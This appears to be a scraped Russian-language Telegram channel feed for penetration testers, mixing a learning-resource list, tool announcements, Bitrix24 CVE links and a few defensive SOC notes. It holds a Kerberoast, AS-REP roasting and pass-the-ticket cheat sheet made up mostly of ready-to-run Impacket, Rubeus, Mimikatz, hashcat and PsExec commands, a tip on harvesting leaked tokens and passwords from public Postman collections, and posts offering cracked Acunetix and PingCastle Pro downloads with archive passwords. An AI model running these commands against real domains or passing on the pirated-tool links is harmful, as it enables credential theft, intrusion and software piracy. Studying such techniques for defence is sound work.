Pentester's Backlog
592 subscribers
313 photos
15 videos
44 files
426 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
Forwarded from Похек (Sergey Zybnev)
⚡️ Подборка ресурсов для изучения информационной безопасности
#подборка #awesome

➡️ Меня довольно часто спрашивают, что где почитать, где практиковаться, как начать зарабатывать. Считаю я закрыл данные вопросы надолго.

1️⃣ Видео
NetworkChuck
John Hammond
STÖK
LiveOverflow
The XSS rat
Sathvik Techtuber
Guided Hacking
Grant Collins
Positive Events
OFFZONE MOSCOW
PwnFunction
DEFCONConference
David Bombal

2️⃣ Теория
HackTricks
PayloadsAllTheThings
Xakep
Poxek
PortSwigger
SecurityLab
Codeby
Awesome DevSecOps
iOS Security Awesome
Android Security Awesome
Personal Security Checklist
RedTeam Tools
OWASP Cheat Sheet Series
six2dez pentest-book
Awesome Bugbounty Writeups
Blog INTIGRITI
PentesterLand Writeups
Pentesting AD mindmap
Conference slides

3️⃣ Практика
TryHackMe
HackTheBox
VulnHub
GoAD
Exploit-DB
PortSwigger Academy
bWAPP
WebGoat
OWASP Juice Shop
FVWA
Root-Me
OverTheWire
Crackmes
Atomic Red Team
Standoff КиберПолигон

4️⃣ Заработок
HH
Хабр Карьера
BI.ZONE Bug Bounty
StandOff Bug Bounty
Yandex Bug Bounty
BUG BOUNTY RU

➡️ Также вы можете пользоваться различными нейросетями, но учитывайте, что ответы не всегда могут быть правдивые.

➡️ @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
1
Forwarded from Волосатый бублик
#linux #ad #mimikatz

[ linikatzV2 ]

Post-exploitation tool for Unix machines attached to a Windows active directory, based on Tim (Wadhwa-)Brown Linikatz tool.
It extracts domain secrets from compromised machines, such as :
— User and machine hashes (SHA-512)
— Machine hash (NTLM) and AES keys
— Kerberos tickets
— Clear text passwords.

This tool needs root privileges to be run on the host system.

Author: 4zrm

https://github.com/Orange-Cyberdefense/LinikatzV2
Мало кто знает, что для осинта можно использовать поиск коллекций в Postman. Часто разработчики оставляют публичные репозитории, содержащие в себе как описание всех API ручек, так и токены авторизации, пароли от админок и бд, сертификаты.

https://www.postman.com/search?q=%D0%B1%D0%B4&scope=all&type=all
👍1
Forwarded from Pwn3rzs
Acunetix Windows v23.9.231020153 - 23 Oct 2023

Download
: https://ponies.cloud/scanner_web/acunetix/Acunetix-v23.9.231020153-Windows-Pwn3rzs-CyberArsenal.rar
Password: Pwn3rzs

NOTE:
The installer was leaked on our chat and then immediately deleted, so we still consider it a valid leak.

NOTE 2:
Stop begging/ asking for Linux version, until a leak happens, we can't release it

Enjoy!
Forwarded from Похек (Sergey Zybnev)
Kerberoast. Когда крадешь билеты на концерт, но не знаешь, как их использовать.
Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.

➡️ Инструменты:
Rubeus
Kerbrute
Impacket
PsExec

➡️ ASREP-Roast

➡️ Impacket
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

Проверка ASREP по списку пользователей домена (не требует доменных учетных данных)
python2 GetNPUsers.py <Domain> -usersfile <UserList>  -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

➡️ Rubeus
Извлечение из всех учетных записей домена
.\Rubeus.exe asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt

➡️ Cracking
Windows
hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt

Linux
john --wordlist rockyou.txt Hashes.txt --format=krb5tgs
hashcat -m 18200 -a 3 Hashes.txt rockyou

➡️ Brute Force

➡️ Kerbrute
./kerbrute userenum <UserList> --dc <IP> --domain <Domain>

➡️ Rubeus
со списком пользователей
.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain>

Kerberos-based Password Spraying
.\Rubeus.exe brute /passwords:<Wordlist>

➡️ Kerberoasting

➡️ Impacket
GetUserSPNs.py <Domain>/<User>:<Password> -dc-ip <IP> -request

➡️ Rubeus
Kerberoast всех пользователей домена
.\Rubeus kerberoast

Все пользователи в поздразделении OU
.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=local

Атака на конкретных пользователей
.\Rubeus.exe kerberoast /user:File_SVC

➡️ Pass-The-Ticket

➡️ Mimikatz
Сбор тикетов
sekurlsa::tickets /export

Инжект тикета
kerberos::ptt <.kirbi file>

Создать CMD с инжектированным тикетом
misc::cmd

➡️ Rubeus
Дамп тикетов
.\Rubeus.exe dump

Инжект тикета
.\Rubeus.exe ptt /ticket:<.kirbi file>

➡️ PsExec
Используется после инъекции тикетов через Rubeus или Mimikatz
.\PsExec.exe -accepteula \\<IP> cmd

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from APT
🔥 Bitrix24 Multiple Vulnerabilities

Multiple high-risk vulnerabilities found in Bitrix24 v22.0.300. These include Remote Command Execution, Cross-Site Scripting, Prototype Pollution, Insecure File Access, and Denial of Service.

🌐 Details and PoC's:

🔗 CVE-2023-1713 (RCE)
🔗 CVE-2023-1714 (RCE)
🔗 CVE-2023-1715 (XSS)
🔗 CVE-2023-1717 (XSS)
🔗 CVE-2023-1718 (DoS)
🔗 CVE-2023-1719 (IDOR)

#bitrix24 #rce #xss #dos #idor
Список Топ10 сценариев (use cases), которые необходимо использовать в SOC, который мониторит АСУ ТП. Это не значит, что не надо мониторить все остальное; просто с этого стоит начинать.
Немного дефенса!

10 Open-Source SIEM-систем
💊2
Forwarded from sdnv's funk-hole
Media is too big
VIEW IN TELEGRAM
Доклад в УрФУ на тему Kerberos от Миши из RedTeam Brazzers.
Были разобраны некоторые базовые атаки, принцип работы и самые популярные механизмы, которые встречаются при каждом внутреннем пентесте.
👍1
Forwarded from Pwn3rzs
PingCastle Pro (No Server Side) 3.1.0.1

Down : https://mir.cr/0JECBXGW
Passw : 20231109_1912


Note : Will provide only report with full Features such as Maturity Level, Mitre etc.
For server Side component we need someone with real license to download the installer from customer zone
#pentest #web

Nuclei + Wordfence = 💗
Этот проект предоставляет обширную актуальную коллекцию шаблонов Nuclei, которые могут быть использованы для сканирования на наличие уязвимостей в WordPress. Шаблоны основаны на отчетах об уязвимостях Wordfence.com.

Больше 9.000 шаблонов на поиск уязвимостей в WP - шикарно!

💻 Github
Please open Telegram to view this post
VIEW IN TELEGRAM